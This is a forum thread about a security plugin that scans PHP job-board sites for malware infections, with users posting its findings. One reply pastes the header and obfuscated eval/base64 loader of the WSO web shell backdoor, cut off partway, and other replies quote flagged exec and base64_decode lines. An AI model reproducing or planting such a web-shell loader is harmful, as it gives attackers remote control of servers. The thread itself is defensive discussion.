Jamit Software Forum
Welcome, Guest. Please login or register.
June 19, 2018, 02:37:45 pm

Login with username, password and session length
Search:     Advanced search
May 27th, 2009 - Jamit Software Launches the forum today!
3,080 Posts in 791 Topics by 1,427,176 Members
Latest Member: CelesteEas
* Home Help Search Login Register
+  Jamit Software Forum
|-+  Jamit Job Board Customers
| |-+  Security
| | |-+  Security Tools Plugin
« previous next »
Pages: [1] 2 3 Print
Author Topic: Security Tools Plugin  (Read 32753 times)
Adam
Administrator
Hero Member
*****
Posts: 112


« on: September 07, 2009, 05:32:36 am »

Just released the security tools plugin today. Available to download from http://www.jamit.com/plugins/SecurityTools.zip

Description: Recently, there has been an alarming increase in the number
of websites infected with malware. Your computer can be infected in seconds
just by visiting a malware infected site - even if you
have the latest anti-virus and upgrades installed.
A site infected with malware is then used to infect your site's visitors.
Once the malware is present on a desktop machine, it is able to steal FTP
passwords / login details and use these details to gain unauthorized access
to infect more sites.

This plugin scans your job board installation, and attempts
to hunt down the infections based on a few common signatures that we found
from analyzing a number of infected sites. The plugin scans PHP files
to find any unusual PHP code, and it is also able to scan some of the job
board's directories to hunt for files out of place.

Be aware, the scanner may report some false-positives.

Available to download from http://www.jamit.com/plugins/SecurityTools.zip

See README.txt for installation details.
Logged
dotmagic
Global Moderator
Sr. Member
*****
Posts: 85


« Reply #1 on: September 07, 2009, 02:14:20 pm »

Excellent plugin.

Nice to see Jamit take more step towards security features of the script and the site.

I have installed it and tested it. Works great.

Thanks to Adam.

Thanks,
BV.
Logged
CompuDave
Global Moderator
Hero Member
*****
Posts: 173



WWW
« Reply #2 on: September 07, 2009, 04:08:37 pm »

Thanks for this. I have just completed installing and running the Security Tools Plugin. Seems to work very well and is very easy to use.

Firstly, a suggestion. Would it be possible to exclude certain folders when performing a scan? My initial scan returned a lot of "results" which were all related to other folders (ie openx, forum, etc).

Scan returned all non job board results.

Hunt returned one issue namely: 9340_tatto1247227692.mp3
However, when trying to locate this file, it is not visible from within my ftp client. The file is meant to be located in the "upload_files/docs" folder but all files in this folder start with 1, 2, 3 or 4.

Logged
rutulo
Jammers
Sr. Member
*
Posts: 40


« Reply #3 on: September 07, 2009, 07:09:11 pm »

I find I file with SCAN file: wso22.php

content is:
<?php
/**
 * WSO 2
 * Web Shell by oRb
 */
$auth = array(
   'md5pass' => "63a9f0ea7bb98050796b649e85481845" // root
);
$color = "#df5";
@define('SELF_PATH', __FILE__);
eval(gzinflate(base64_decode('7X1rV9tKsuhnzlrnP3Q0nC17xxjbQCYxGMIbEkIIj5AHuRxZkm0F2dKWZAzJ8N9vVfVDLVk2Jtln7r1r3Zm1g9VdXV39qq6urqr2OiUWJ1EYxKX567Pd04+7p1/Ng/Pzk+sL+Lre3N89Pje/Vcz9IOj6rllmz1ot1rH82GVl9vM//2Ou51qOG5WozGK9WmPLtWV2HCRsLxgOHLO8CjDunZfA34f.....


was in public_html directory and when I open on the browser, jus ask for a password. Now I delated.
Logged
Peter
Administrator
Hero Member
*****
Posts: 248



« Reply #4 on: September 07, 2009, 10:57:06 pm »

Rutulo,

That's definitely malicious code. I admire you that you dared to view it in your browser.
Logged

SECURE your site BEFORE you wish you had! Use plugins by COLOSSAL MIND!
Amjad
Global Moderator
Hero Member
*****
Posts: 109


« Reply #5 on: September 08, 2009, 12:06:57 am »

Hi,
First thank you for this much needed security tool.....

I installed it and run it on my JB and i got the following warning message

Possibly bad code (execution of a shell command) /public_html/include/edit_config.php on line 909:
@exec ("w", $out);

any suggestions?

Regards,
Amjad
« Last Edit: September 08, 2009, 12:51:55 am by jobs.ps » Logged
Adam
Administrator
Hero Member
*****
Posts: 112


« Reply #6 on: September 08, 2009, 01:44:54 am »

wso22.php - definitely a back-door & should be deleted.
Mp3 files should be safe - its a bug that the plugin flags them, it will be fixed for the next revision.
@exec ("w", $out); - it is totally safe, I'll put on the white list for the next version.
Thanks for reporting!
Logged
Adam
Administrator
Hero Member
*****
Posts: 112


« Reply #7 on: September 08, 2009, 01:51:02 am »

Amjad - your edit_config.php file is in the wrong directory, it should not be in include/ but in admin/, please delete it from include/
Logged
Amjad
Global Moderator
Hero Member
*****
Posts: 109


« Reply #8 on: September 08, 2009, 11:51:02 am »

Done
Thnx Adam
Logged
promotionbox.de
Jammers
Hero Member
*
Posts: 110



WWW
« Reply #9 on: September 09, 2009, 09:14:31 am »

Ok security tool works fine, nothing unsual code found. How often I must run the scan?

Thanks
-Thorsten
Logged

---
promotion:box | clever. smart. friendly.
www.promotionbox.de
abhishek1711
Guest
« Reply #10 on: September 29, 2009, 08:28:10 am »

guys this scares me - it shows 167 threats on my job board MbaNaukri.com - (users have sometimes complained when they try to visit site it says like "Urgent notice your website MBA naukri has been infected with trojan Virus. People having Kaspersky installed in their system cannot search your website after initial login")

have attached the results given by the plugin, plz help
Logged
Banenpak
Global Moderator
Hero Member
*****
Posts: 100


« Reply #11 on: September 30, 2009, 03:35:35 pm »

Thanks Adam!
Logged
Philcol
Jammers
Jr. Member
*
Posts: 15


« Reply #12 on: October 19, 2009, 09:09:31 pm »

Found a file:  class.php
line 36: 
$mess64 = base64_decode($_POST['message']);

Another:

adw.php
line 40: $mess64 = base64_decode($_POST['message']);

Delete?
Logged
Philcol
Jammers
Jr. Member
*
Posts: 15


« Reply #13 on: October 19, 2009, 09:40:31 pm »

Found another:

edit_config.php on line 909:
@exec ("w", $out);

Advice on this one? 
Logged
Philcol
Jammers
Jr. Member
*
Posts: 15


« Reply #14 on: October 19, 2009, 09:54:44 pm »

Found these on yet another domain:

include/functions2.php on line 231:
$make_magick = exec($command, $retval);

include/functions2.php on line 1701:
exec ("w", $out);

include/edit_config.php on line 909:
@exec ("w", $out);

cache/cat_f4_c0_cache.inc.php on line 2:
$category_table = unserialize('a:2:{s:2:"EN";a:3:{i:0;a:7:{s:3:"cid";s:3:"703";s:4:"cpid";s:1:"0";s:1:"n";s:15:"Consulting Firm";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:1;a:7:{s:3:"cid";s:3:"702";s:4:"cpid";s:1:"0";s:1:"n";s:24:"Private System Operator ";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:2;a:7:{s:3:"cid";s:3:"701";s:4:"cpid";s:1:"0";s:1:"n";s:22:"Water System (Public) ";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}}s:2:"ES";a:3:{i:0;a:7:{s:3:"cid";s:3:"703";s:4:"cpid";s:1:"0";s:1:"n";s:15:"Consulting Firm";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:1;a:7:{s:3:"cid";s:3:"702";s:4:"cpid";s:1:"0";s:1:"n";s:24:"Private System Operator ";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:2;a:7:{s:3:"cid";s:3:"701";s:4:"cpid";s:1:"0";s:1:"n";s:22:"Water System (Public) ";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}}}');
Logged
Pages: [1] 2 3 Print 
« previous next »
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2013, Simple Machines Valid XHTML 1.0! Valid CSS!
Page created in 0.153 seconds with 17 queries.